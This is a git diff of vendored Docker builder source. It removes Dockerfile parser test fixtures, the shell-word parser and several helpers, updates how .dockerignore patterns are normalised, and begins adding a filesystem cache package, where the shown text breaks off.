ubuntu:12.04 - -EXPOSE 27015 -EXPOSE 27005 -EXPOSE 26901 -EXPOSE 27020 - -RUN apt-get update && apt-get install libc6-dev-i386 curl unzip -y -RUN mkdir -p /steam -RUN curl http://media.steampowered.com/client/steamcmd_linux.tar.gz | tar vxz -C /steam -ADD ./script /steam/script -RUN /steam/steamcmd.sh +runscript /steam/script -RUN curl http://mirror.pointysoftware.net/alliedmodders/mmsource-1.10.0-linux.tar.gz | tar vxz -C /steam/tf2/tf -RUN curl http://mirror.pointysoftware.net/alliedmodders/sourcemod-1.5.3-linux.tar.gz | tar vxz -C /steam/tf2/tf -ADD ./server.cfg /steam/tf2/tf/cfg/server.cfg -ADD ./ctf_2fort.cfg /steam/tf2/tf/cfg/ctf_2fort.cfg -ADD ./sourcemod.cfg /steam/tf2/tf/cfg/sourcemod/sourcemod.cfg -RUN rm -r /steam/tf2/tf/addons/sourcemod/configs -ADD ./configs /steam/tf2/tf/addons/sourcemod/configs -RUN mkdir -p /steam/tf2/tf/addons/sourcemod/translations/en -RUN cp /steam/tf2/tf/addons/sourcemod/translations/*.txt /steam/tf2/tf/addons/sourcemod/translations/en - -CMD cd /steam/tf2 && ./srcds_run -port 27015 +ip 0.0.0.0 +map ctf_2fort -autoupdate -steam_dir /steam -steamcmd_script /steam/script +tf_bot_quota 12 +tf_bot_quota_mode fill diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result deleted file mode 100644 index d4f94cd8be..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result +++ /dev/null @@ -1,20 +0,0 @@ -(from "ubuntu:12.04") -(expose "27015") -(expose "27005") -(expose "26901") -(expose "27020") -(run "apt-get update && apt-get install libc6-dev-i386 curl unzip -y") -(run "mkdir -p /steam") -(run "curl http://media.steampowered.com/client/steamcmd_linux.tar.gz | tar vxz -C /steam") -(add "./script" "/steam/script") -(run "/steam/steamcmd.sh +runscript /steam/script") -(run "curl http://mirror.pointysoftware.net/alliedmodders/mmsource-1.10.0-linux.tar.gz | tar vxz -C /steam/tf2/tf") -(run "curl http://mirror.pointysoftware.net/alliedmodders/sourcemod-1.5.3-linux.tar.gz | tar vxz -C /steam/tf2/tf") -(add "./server.cfg" "/steam/tf2/tf/cfg/server.cfg") -(add "./ctf_2fort.cfg" "/steam/tf2/tf/cfg/ctf_2fort.cfg") -(add "./sourcemod.cfg" "/steam/tf2/tf/cfg/sourcemod/sourcemod.cfg") -(run "rm -r /steam/tf2/tf/addons/sourcemod/configs") -(add "./configs" "/steam/tf2/tf/addons/sourcemod/configs") -(run "mkdir -p /steam/tf2/tf/addons/sourcemod/translations/en") -(run "cp /steam/tf2/tf/addons/sourcemod/translations/*.txt /steam/tf2/tf/addons/sourcemod/translations/en") -(cmd "cd /steam/tf2 && ./srcds_run -port 27015 +ip 0.0.0.0 +map ctf_2fort -autoupdate -steam_dir /steam -steamcmd_script /steam/script +tf_bot_quota 12 +tf_bot_quota_mode fill") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile deleted file mode 100644 index 4842088166..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile +++ /dev/null @@ -1,9 +0,0 @@ -FROM ubuntu:14.04 - -RUN apt-get update -qy && apt-get install tmux zsh weechat-curses -y - -ADD .weechat /.weechat -ADD .tmux.conf / -RUN echo "export TERM=screen-256color" >/.zshenv - -CMD zsh -c weechat diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result deleted file mode 100644 index c3abb4c54f..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result +++ /dev/null @@ -1,6 +0,0 @@ -(from "ubuntu:14.04") -(run "apt-get update -qy && apt-get install tmux zsh weechat-curses -y") -(add ".weechat" "/.weechat") -(add ".tmux.conf" "/") -(run "echo \"export TERM=screen-256color\" >/.zshenv") -(cmd "zsh -c weechat") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile deleted file mode 100644 index 3a4da6e916..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile +++ /dev/null @@ -1,7 +0,0 @@ -FROM ubuntu:14.04 -MAINTAINER Erik Hollensbe - -RUN apt-get update && apt-get install znc -y -ADD conf /.znc - -CMD [ "/usr/bin/znc", "-f", "-r" ] diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result deleted file mode 100644 index 5493b255fd..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result +++ /dev/null @@ -1,5 +0,0 @@ -(from "ubuntu:14.04") -(maintainer "Erik Hollensbe ") -(run "apt-get update && apt-get install znc -y") -(add "conf" "/.znc") -(cmd "/usr/bin/znc" "-f" "-r") diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go deleted file mode 100644 index cd7af75e79..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go +++ /dev/null @@ -1,176 +0,0 @@ -package parser - -import ( - "fmt" - "strconv" - "strings" - "unicode" -) - -// Dump dumps the AST defined by `node` as a list of sexps. -// Returns a string suitable for printing. -func (node *Node) Dump() string { - str := "" - str += node.Value - - if len(node.Flags) > 0 { - str += fmt.Sprintf(" %q", node.Flags) - } - - for _, n := range node.Children { - str += "(" + n.Dump() + ")\n" - } - - if node.Next != nil { - for n := node.Next; n != nil; n = n.Next { - if len(n.Children) > 0 { - str += " " + n.Dump() - } else { - str += " " + strconv.Quote(n.Value) - } - } - } - - return strings.TrimSpace(str) -} - -// performs the dispatch based on the two primal strings, cmd and args. Please -// look at the dispatch table in parser.go to see how these dispatchers work. -func fullDispatch(cmd, args string, d *Directive) (*Node, map[string]bool, error) { - fn := dispatch[cmd] - - // Ignore invalid Dockerfile instructions - if fn == nil { - fn = parseIgnore - } - - sexp, attrs, err := fn(args, d) - if err != nil { - return nil, nil, err - } - - return sexp, attrs, nil -} - -// splitCommand takes a single line of text and parses out the cmd and args, -// which are used for dispatching to more exact parsing functions. -func splitCommand(line string) (string, []string, string, error) { - var args string - var flags []string - - // Make sure we get the same results irrespective of leading/trailing spaces - cmdline := tokenWhitespace.Split(strings.TrimSpace(line), 2) - cmd := strings.ToLower(cmdline[0]) - - if len(cmdline) == 2 { - var err error - args, flags, err = extractBuilderFlags(cmdline[1]) - if err != nil { - return "", nil, "", err - } - } - - return cmd, flags, strings.TrimSpace(args), nil -} - -// covers comments and empty lines. Lines should be trimmed before passing to -// this function. -func stripComments(line string) string { - // string is already trimmed at this point - if tokenComment.MatchString(line) { - return tokenComment.ReplaceAllString(line, "") - } - - return line -} - -func extractBuilderFlags(line string) (string, []string, error) { - // Parses the BuilderFlags and returns the remaining part of the line - - const ( - inSpaces = iota // looking for start of a word - inWord - inQuote - ) - - words := []string{} - phase := inSpaces - word := "" - quote := '\000' - blankOK := false - var ch rune - - for pos := 0; pos <= len(line); pos++ { - if pos != len(line) { - ch = rune(line[pos]) - } - - if phase == inSpaces { // Looking for start of word - if pos == len(line) { // end of input - break - } - if unicode.IsSpace(ch) { // skip spaces - continue - } - - // Only keep going if the next word starts with -- - if ch != '-' || pos+1 == len(line) || rune(line[pos+1]) != '-' { - return line[pos:], words, nil - } - - phase = inWord // found someting with "--", fall through - } - if (phase == inWord || phase == inQuote) && (pos == len(line)) { - if word != "--" && (blankOK || len(word) > 0) { - words = append(words, word) - } - break - } - if phase == inWord { - if unicode.IsSpace(ch) { - phase = inSpaces - if word == "--" { - return line[pos:], words, nil - } - if blankOK || len(word) > 0 { - words = append(words, word) - } - word = "" - blankOK = false - continue - } - if ch == '\'' || ch == '"' { - quote = ch - blankOK = true - phase = inQuote - continue - } - if ch == '\\' { - if pos+1 == len(line) { - continue // just skip \ at end - } - pos++ - ch = rune(line[pos]) - } - word += string(ch) - continue - } - if phase == inQuote { - if ch == quote { - phase = inWord - continue - } - if ch == '\\' { - if pos+1 == len(line) { - phase = inWord - continue // just skip \ at end - } - pos++ - ch = rune(line[pos]) - } - word += string(ch) - } - } - - return "", words, nil -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go deleted file mode 100644 index 189afd1fdb..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go +++ /dev/null @@ -1,329 +0,0 @@ -package dockerfile - -// This will take a single word and an array of env variables and -// process all quotes (" and ') as well as $xxx and ${xxx} env variable -// tokens. Tries to mimic bash shell process. -// It doesn't support all flavors of ${xx:...} formats but new ones can -// be added by adding code to the "special ${} format processing" section - -import ( - "fmt" - "runtime" - "strings" - "text/scanner" - "unicode" -) - -type shellWord struct { - word string - scanner scanner.Scanner - envs []string - pos int - escapeToken rune -} - -// ProcessWord will use the 'env' list of environment variables, -// and replace any env var references in 'word'. -func ProcessWord(word string, env []string, escapeToken rune) (string, error) { - sw := &shellWord{ - word: word, - envs: env, - pos: 0, - escapeToken: escapeToken, - } - sw.scanner.Init(strings.NewReader(word)) - word, _, err := sw.process() - return word, err -} - -// ProcessWords will use the 'env' list of environment variables, -// and replace any env var references in 'word' then it will also -// return a slice of strings which represents the 'word' -// split up based on spaces - taking into account quotes. Note that -// this splitting is done **after** the env var substitutions are done. -// Note, each one is trimmed to remove leading and trailing spaces (unless -// they are quoted", but ProcessWord retains spaces between words. -func ProcessWords(word string, env []string, escapeToken rune) ([]string, error) { - sw := &shellWord{ - word: word, - envs: env, - pos: 0, - escapeToken: escapeToken, - } - sw.scanner.Init(strings.NewReader(word)) - _, words, err := sw.process() - return words, err -} - -func (sw *shellWord) process() (string, []string, error) { - return sw.processStopOn(scanner.EOF) -} - -type wordsStruct struct { - word string - words []string - inWord bool -} - -func (w *wordsStruct) addChar(ch rune) { - if unicode.IsSpace(ch) && w.inWord { - if len(w.word) != 0 { - w.words = append(w.words, w.word) - w.word = "" - w.inWord = false - } - } else if !unicode.IsSpace(ch) { - w.addRawChar(ch) - } -} - -func (w *wordsStruct) addRawChar(ch rune) { - w.word += string(ch) - w.inWord = true -} - -func (w *wordsStruct) addString(str string) { - var scan scanner.Scanner - scan.Init(strings.NewReader(str)) - for scan.Peek() != scanner.EOF { - w.addChar(scan.Next()) - } -} - -func (w *wordsStruct) addRawString(str string) { - w.word += str - w.inWord = true -} - -func (w *wordsStruct) getWords() []string { - if len(w.word) > 0 { - w.words = append(w.words, w.word) - - // Just in case we're called again by mistake - w.word = "" - w.inWord = false - } - return w.words -} - -// Process the word, starting at 'pos', and stop when we get to the -// end of the word or the 'stopChar' character -func (sw *shellWord) processStopOn(stopChar rune) (string, []string, error) { - var result string - var words wordsStruct - - var charFuncMapping = map[rune]func() (string, error){ - '\'': sw.processSingleQuote, - '"': sw.processDoubleQuote, - '$': sw.processDollar, - } - - for sw.scanner.Peek() != scanner.EOF { - ch := sw.scanner.Peek() - - if stopChar != scanner.EOF && ch == stopChar { - sw.scanner.Next() - break - } - if fn, ok := charFuncMapping[ch]; ok { - // Call special processing func for certain chars - tmp, err := fn() - if err != nil { - return "", []string{}, err - } - result += tmp - - if ch == rune('$') { - words.addString(tmp) - } else { - words.addRawString(tmp) - } - } else { - // Not special, just add it to the result - ch = sw.scanner.Next() - - if ch == sw.escapeToken { - // '\' (default escape token, but ` allowed) escapes, except end of line - - ch = sw.scanner.Next() - - if ch == scanner.EOF { - break - } - - words.addRawChar(ch) - } else { - words.addChar(ch) - } - - result += string(ch) - } - } - - return result, words.getWords(), nil -} - -func (sw *shellWord) processSingleQuote() (string, error) { - // All chars between single quotes are taken as-is - // Note, you can't escape ' - var result string - - sw.scanner.Next() - - for { - ch := sw.scanner.Next() - if ch == '\'' || ch == scanner.EOF { - break - } - result += string(ch) - } - - return result, nil -} - -func (sw *shellWord) processDoubleQuote() (string, error) { - // All chars up to the next " are taken as-is, even ', except any $ chars - // But you can escape " with a \ (or ` if escape token set accordingly) - var result string - - sw.scanner.Next() - - for sw.scanner.Peek() != scanner.EOF { - ch := sw.scanner.Peek() - if ch == '"' { - sw.scanner.Next() - break - } - if ch == '$' { - tmp, err := sw.processDollar() - if err != nil { - return "", err - } - result += tmp - } else { - ch = sw.scanner.Next() - if ch == sw.escapeToken { - chNext := sw.scanner.Peek() - - if chNext == scanner.EOF { - // Ignore \ at end of word - continue - } - - if chNext == '"' || chNext == '$' { - // \" and \$ can be escaped, all other \'s are left as-is - ch = sw.scanner.Next() - } - } - result += string(ch) - } - } - - return result, nil -} - -func (sw *shellWord) processDollar() (string, error) { - sw.scanner.Next() - ch := sw.scanner.Peek() - if ch == '{' { - sw.scanner.Next() - name := sw.processName() - ch = sw.scanner.Peek() - if ch == '}' { - // Normal ${xx} case - sw.scanner.Next() - return sw.getEnv(name), nil - } - if ch == ':' { - // Special ${xx:...} format processing - // Yes it allows for recursive $'s in the ... spot - - sw.scanner.Next() // skip over : - modifier := sw.scanner.Next() - - word, _, err := sw.processStopOn('}') - if err != nil { - return "", err - } - - // Grab the current value of the variable in question so we - // can use to to determine what to do based on the modifier - newValue := sw.getEnv(name) - - switch modifier { - case '+': - if newValue != "" { - newValue = word - } - return newValue, nil - - case '-': - if newValue == "" { - newValue = word - } - return newValue, nil - - default: - return "", fmt.Errorf("Unsupported modifier (%c) in substitution: %s", modifier, sw.word) - } - } - return "", fmt.Errorf("Missing ':' in substitution: %s", sw.word) - } - // $xxx case - name := sw.processName() - if name == "" { - return "$", nil - } - return sw.getEnv(name), nil -} - -func (sw *shellWord) processName() string { - // Read in a name (alphanumeric or _) - // If it starts with a numeric then just return $# - var name string - - for sw.scanner.Peek() != scanner.EOF { - ch := sw.scanner.Peek() - if len(name) == 0 && unicode.IsDigit(ch) { - ch = sw.scanner.Next() - return string(ch) - } - if !unicode.IsLetter(ch) && !unicode.IsDigit(ch) && ch != '_' { - break - } - ch = sw.scanner.Next() - name += string(ch) - } - - return name -} - -func (sw *shellWord) getEnv(name string) string { - if runtime.GOOS == "windows" { - // Case-insensitive environment variables on Windows - name = strings.ToUpper(name) - } - for _, env := range sw.envs { - i := strings.Index(env, "=") - if i < 0 { - if runtime.GOOS == "windows" { - env = strings.ToUpper(env) - } - if name == env { - // Should probably never get here, but just in case treat - // it like "var" and "var=" are the same - return "" - } - continue - } - compareName := env[:i] - if runtime.GOOS == "windows" { - compareName = strings.ToUpper(compareName) - } - if name != compareName { - continue - } - return env[i+1:] - } - return "" -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go deleted file mode 100644 index 6cf691c077..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go +++ /dev/null @@ -1,155 +0,0 @@ -package dockerfile - -import ( - "bufio" - "os" - "runtime" - "strings" - "testing" -) - -func TestShellParser4EnvVars(t *testing.T) { - fn := "envVarTest" - lineCount := 0 - - file, err := os.Open(fn) - if err != nil { - t.Fatalf("Can't open '%s': %s", err, fn) - } - defer file.Close() - - scanner := bufio.NewScanner(file) - envs := []string{"PWD=/home", "SHELL=bash", "KOREAN=한국어"} - for scanner.Scan() { - line := scanner.Text() - lineCount++ - - // Trim comments and blank lines - i := strings.Index(line, "#") - if i >= 0 { - line = line[:i] - } - line = strings.TrimSpace(line) - - if line == "" { - continue - } - - words := strings.Split(line, "|") - if len(words) != 3 { - t.Fatalf("Error in '%s' - should be exactly one | in:%q", fn, line) - } - - words[0] = strings.TrimSpace(words[0]) - words[1] = strings.TrimSpace(words[1]) - words[2] = strings.TrimSpace(words[2]) - - // Key W=Windows; A=All; U=Unix - if (words[0] != "W") && (words[0] != "A") && (words[0] != "U") { - t.Fatalf("Invalid tag %s at line %d of %s. Must be W, A or U", words[0], lineCount, fn) - } - - if ((words[0] == "W" || words[0] == "A") && runtime.GOOS == "windows") || - ((words[0] == "U" || words[0] == "A") && runtime.GOOS != "windows") { - newWord, err := ProcessWord(words[1], envs, '\\') - - if err != nil { - newWord = "error" - } - - if newWord != words[2] { - t.Fatalf("Error. Src: %s Calc: %s Expected: %s at line %d", words[1], newWord, words[2], lineCount) - } - } - } -} - -func TestShellParser4Words(t *testing.T) { - fn := "wordsTest" - - file, err := os.Open(fn) - if err != nil { - t.Fatalf("Can't open '%s': %s", err, fn) - } - defer file.Close() - - envs := []string{} - scanner := bufio.NewScanner(file) - for scanner.Scan() { - line := scanner.Text() - - if strings.HasPrefix(line, "#") { - continue - } - - if strings.HasPrefix(line, "ENV ") { - line = strings.TrimLeft(line[3:], " ") - envs = append(envs, line) - continue - } - - words := strings.Split(line, "|") - if len(words) != 2 { - t.Fatalf("Error in '%s' - should be exactly one | in: %q", fn, line) - } - test := strings.TrimSpace(words[0]) - expected := strings.Split(strings.TrimLeft(words[1], " "), ",") - - result, err := ProcessWords(test, envs, '\\') - - if err != nil { - result = []string{"error"} - } - - if len(result) != len(expected) { - t.Fatalf("Error. %q was suppose to result in %q, but got %q instead", test, expected, result) - } - for i, w := range expected { - if w != result[i] { - t.Fatalf("Error. %q was suppose to result in %q, but got %q instead", test, expected, result) - } - } - } -} - -func TestGetEnv(t *testing.T) { - sw := &shellWord{ - word: "", - envs: nil, - pos: 0, - } - - sw.envs = []string{} - if sw.getEnv("foo") != "" { - t.Fatalf("2 - 'foo' should map to ''") - } - - sw.envs = []string{"foo"} - if sw.getEnv("foo") != "" { - t.Fatalf("3 - 'foo' should map to ''") - } - - sw.envs = []string{"foo="} - if sw.getEnv("foo") != "" { - t.Fatalf("4 - 'foo' should map to ''") - } - - sw.envs = []string{"foo=bar"} - if sw.getEnv("foo") != "bar" { - t.Fatalf("5 - 'foo' should map to 'bar'") - } - - sw.envs = []string{"foo=bar", "car=hat"} - if sw.getEnv("foo") != "bar" { - t.Fatalf("6 - 'foo' should map to 'bar'") - } - if sw.getEnv("car") != "hat" { - t.Fatalf("7 - 'car' should map to 'hat'") - } - - // Make sure we grab the first 'car' in the list - sw.envs = []string{"foo=bar", "car=hat", "car=bike"} - if sw.getEnv("car") != "hat" { - t.Fatalf("8 - 'car' should map to 'hat'") - } -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/support.go b/vendor/github.com/docker/docker/builder/dockerfile/support.go deleted file mode 100644 index e87588910b..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/support.go +++ /dev/null @@ -1,19 +0,0 @@ -package dockerfile - -import "strings" - -// handleJSONArgs parses command passed to CMD, ENTRYPOINT, RUN and SHELL instruction in Dockerfile -// for exec form it returns untouched args slice -// for shell form it returns concatenated args as the first element of a slice -func handleJSONArgs(args []string, attributes map[string]bool) []string { - if len(args) == 0 { - return []string{} - } - - if attributes != nil && attributes["json"] { - return args - } - - // literal string command, not an exec array - return []string{strings.Join(args, " ")} -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/support_test.go b/vendor/github.com/docker/docker/builder/dockerfile/support_test.go deleted file mode 100644 index 7cc6fe9dcb..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/support_test.go +++ /dev/null @@ -1,65 +0,0 @@ -package dockerfile - -import "testing" - -type testCase struct { - name string - args []string - attributes map[string]bool - expected []string -} - -func initTestCases() []testCase { - testCases := []testCase{} - - testCases = append(testCases, testCase{ - name: "empty args", - args: []string{}, - attributes: make(map[string]bool), - expected: []string{}, - }) - - jsonAttributes := make(map[string]bool) - jsonAttributes["json"] = true - - testCases = append(testCases, testCase{ - name: "json attribute with one element", - args: []string{"foo"}, - attributes: jsonAttributes, - expected: []string{"foo"}, - }) - - testCases = append(testCases, testCase{ - name: "json attribute with two elements", - args: []string{"foo", "bar"}, - attributes: jsonAttributes, - expected: []string{"foo", "bar"}, - }) - - testCases = append(testCases, testCase{ - name: "no attributes", - args: []string{"foo", "bar"}, - attributes: nil, - expected: []string{"foo bar"}, - }) - - return testCases -} - -func TestHandleJSONArgs(t *testing.T) { - testCases := initTestCases() - - for _, test := range testCases { - arguments := handleJSONArgs(test.args, test.attributes) - - if len(arguments) != len(test.expected) { - t.Fatalf("In test \"%s\": length of returned slice is incorrect. Expected: %d, got: %d", test.name, len(test.expected), len(arguments)) - } - - for i := range test.expected { - if arguments[i] != test.expected[i] { - t.Fatalf("In test \"%s\": element as position %d is incorrect. Expected: %s, got: %s", test.name, i, test.expected[i], arguments[i]) - } - } - } -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go b/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go index 80a3f1babf..3d615f3460 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go @@ -1,4 +1,4 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/builder/dockerfile/wordsTest b/vendor/github.com/docker/docker/builder/dockerfile/wordsTest deleted file mode 100644 index fa916c67f9..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/wordsTest +++ /dev/null @@ -1,25 +0,0 @@ -hello | hello -hello${hi}bye | hellobye -ENV hi=hi -hello${hi}bye | hellohibye -ENV space=abc def -hello${space}bye | helloabc,defbye -hello"${space}"bye | helloabc defbye -hello "${space}"bye | hello,abc defbye -ENV leading= ab c -hello${leading}def | hello,ab,cdef -hello"${leading}" def | hello ab c,def -hello"${leading}" | hello ab c -hello${leading} | hello,ab,c -# next line MUST have 3 trailing spaces, don't erase them! -ENV trailing=ab c -hello${trailing} | helloab,c -hello${trailing}d | helloab,c,d -hello"${trailing}"d | helloab c d -# next line MUST have 3 trailing spaces, don't erase them! -hel"lo${trailing}" | helloab c -hello" there " | hello there -hello there | hello,there -hello\ there | hello there -hello" there | hello there -hello\" there | hello",there diff --git a/vendor/github.com/docker/docker/builder/dockerignore.go b/vendor/github.com/docker/docker/builder/dockerignore.go deleted file mode 100644 index 3da7913367..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerignore.go +++ /dev/null @@ -1,48 +0,0 @@ -package builder - -import ( - "os" - - "github.com/docker/docker/builder/dockerignore" - "github.com/docker/docker/pkg/fileutils" -) - -// DockerIgnoreContext wraps a ModifiableContext to add a method -// for handling the .dockerignore file at the root of the context. -type DockerIgnoreContext struct { - ModifiableContext -} - -// Process reads the .dockerignore file at the root of the embedded context. -// If .dockerignore does not exist in the context, then nil is returned. -// -// It can take a list of files to be removed after .dockerignore is removed. -// This is used for server-side implementations of builders that need to send -// the .dockerignore file as well as the special files specified in filesToRemove, -// but expect them to be excluded from the context after they were processed. -// -// For example, server-side Dockerfile builders are expected to pass in the name -// of the Dockerfile to be removed after it was parsed. -// -// TODO: Don't require a ModifiableContext (use Context instead) and don't remove -// files, instead handle a list of files to be excluded from the context. -func (c DockerIgnoreContext) Process(filesToRemove []string) error { - f, err := c.Open(".dockerignore") - // Note that a missing .dockerignore file isn't treated as an error - if err != nil { - if os.IsNotExist(err) { - return nil - } - return err - } - excludes, _ := dockerignore.ReadAll(f) - f.Close() - filesToRemove = append([]string{".dockerignore"}, filesToRemove...) - for _, fileToRemove := range filesToRemove { - rm, _ := fileutils.Matches(fileToRemove, excludes) - if rm { - c.Remove(fileToRemove) - } - } - return nil -} diff --git a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go index 2db67be799..57f224afc8 100644 --- a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go +++ b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go @@ -1,4 +1,4 @@ -package dockerignore +package dockerignore // import "github.com/docker/docker/builder/dockerignore" import ( "bufio" @@ -38,8 +38,23 @@ func ReadAll(reader io.Reader) ([]string, error) { if pattern == "" { continue } - pattern = filepath.Clean(pattern) - pattern = filepath.ToSlash(pattern) + // normalize absolute paths to paths relative to the context + // (taking care of '!' prefix) + invert := pattern[0] == '!' + if invert { + pattern = strings.TrimSpace(pattern[1:]) + } + if len(pattern) > 0 { + pattern = filepath.Clean(pattern) + pattern = filepath.ToSlash(pattern) + if len(pattern) > 1 && pattern[0] == '/' { + pattern = pattern[1:] + } + } + if invert { + pattern = "!" + pattern + } + excludes = append(excludes, pattern) } if err := scanner.Err(); err != nil { diff --git a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go index 612a1399cd..06186cc120 100644 --- a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go +++ b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go @@ -1,4 +1,4 @@ -package dockerignore +package dockerignore // import "github.com/docker/docker/builder/dockerignore" import ( "fmt" @@ -25,7 +25,7 @@ func TestReadAll(t *testing.T) { } diName := filepath.Join(tmpDir, ".dockerignore") - content := fmt.Sprintf("test1\n/test2\n/a/file/here\n\nlastfile") + content := fmt.Sprintf("test1\n/test2\n/a/file/here\n\nlastfile\n# this is a comment\n! /inverted/abs/path\n!\n! \n") err = ioutil.WriteFile(diName, []byte(content), 0777) if err != nil { t.Fatal(err) @@ -42,16 +42,28 @@ func TestReadAll(t *testing.T) { t.Fatal(err) } + if len(di) != 7 { + t.Fatalf("Expected 5 entries, got %v", len(di)) + } if di[0] != "test1" { - t.Fatalf("First element is not test1") + t.Fatal("First element is not test1") } - if di[1] != "/test2" { - t.Fatalf("Second element is not /test2") + if di[1] != "test2" { // according to https://docs.docker.com/engine/reference/builder/#dockerignore-file, /foo/bar should be treated as foo/bar + t.Fatal("Second element is not test2") } - if di[2] != "/a/file/here" { - t.Fatalf("Third element is not /a/file/here") + if di[2] != "a/file/here" { // according to https://docs.docker.com/engine/reference/builder/#dockerignore-file, /foo/bar should be treated as foo/bar + t.Fatal("Third element is not a/file/here") } if di[3] != "lastfile" { - t.Fatalf("Fourth element is not lastfile") + t.Fatal("Fourth element is not lastfile") + } + if di[4] != "!inverted/abs/path" { + t.Fatal("Fifth element is not !inverted/abs/path") + } + if di[5] != "!" { + t.Fatalf("Sixth element is not !, but %s", di[5]) + } + if di[6] != "!" { + t.Fatalf("Sixth element is not !, but %s", di[6]) } } diff --git a/vendor/github.com/docker/docker/builder/fscache/fscache.go b/vendor/github.com/docker/docker/builder/fscache/fscache.go new file mode 100644 index 0000000000..92c3ea4adb --- /dev/null +++ b/vendor/github.com/docker/docker/builder/fscache/fscache.go @@ -0,0 +1,652 @@ +package fscache // import "github.com/docker/docker/builder/fscache" + +import ( + "archive/tar" + "context" + "crypto/sha256" + "encoding/json" + "hash" + "os" + "path/filepath" + "sort" + "sync" + "time" + + "github.com/boltdb/bolt" + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/remotecontext" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/directory" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/tarsum" + "github.com/moby/buildkit/session/filesync" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "github.com/tonistiigi/fsutil" + "golang.org/x/sync/singleflight" +) + +const dbFile = "fscache.db" +const cacheKey = "cache" +const metaKey = "meta" + +// Backend is a backing implementation for FSCache +type Backend interface { + Get(id string) (string, error) + Remove(id string) error +} + +// FSCache allows syncing remote resources to cached snapshots +type FSCache struct { + opt Opt + transports map[string]Transport + mu sync.Mutex + g singleflight.Group + store *fsCacheStore +} + +// Opt defines options for initializing FSCache +type Opt struct { + Backend Backend + Root string // for storing local metadata + GCPolicy GCPolicy +} + +// GCPolicy defines policy for garbage collection +type GCPolicy struct { + MaxSize uint64 + MaxKeepDuration time.Duration +} + +// NewFSCache returns new FSCache object +func NewFSCache(opt Opt) (*FSCache, error) { + store, err := newFSCacheStore(opt) + if err != nil { + return nil, err + } + return &FSCache{ + store: store, + opt: opt, + transports: make(map[string]Transport), + }, nil +} + +// Transport defines a method for syncing remote data to FSCache +type Transport interface { + Copy(ctx context.Context, id RemoteIdentifier, dest string, cs filesync.CacheUpdater) error +} + +// RemoteIdentifier identifies a transfer request +type RemoteIdentifier interface { + Key() string + SharedKey() string + Transport() string +} + +// RegisterTransport registers a new transport method +func (fsc *FSCache) RegisterTransport(id string, transport Transport) error { + fsc.mu.Lock() + defer fsc.mu.Unlock() + if _, ok := fsc.transports[id]; ok { + return errors.Errorf("transport %v already exists", id) + } + fsc.transports[id] = transport + return nil +} + +// SyncFrom returns a source based on a remote identifier +func (fsc *FSCache) SyncFrom(ctx context.Context, id RemoteIdentifier) (builder.Source, error) { // cacheOpt + trasportID := id.Transport() + fsc.mu.Lock() + transport, ok := fsc.transports[id.Transport()] + if !ok { + fsc.mu.Unlock() + return nil, errors.Errorf("invalid transport %s", trasportID) + } + + logrus.Debugf("SyncFrom %s %s", id.Key(), id.SharedKey()) + fsc.mu.Unlock() + sourceRef, err, _ := fsc.g.Do(id.Key(), func() (interface{}, error) { + var sourceRef *cachedSourceRef + sourceRef, err := fsc.store.Get(id.Key()) + if err == nil { + return sourceRef, nil + } + + // check for unused shared cache + sharedKey := id.SharedKey() + if sharedKey != "" { + r, err := fsc.store.Rebase(sharedKey, id.Key()) + if err == nil { + sourceRef = r + } + } + + if sourceRef == nil { + var err error + sourceRef, err = fsc.store.New(id.Key(), 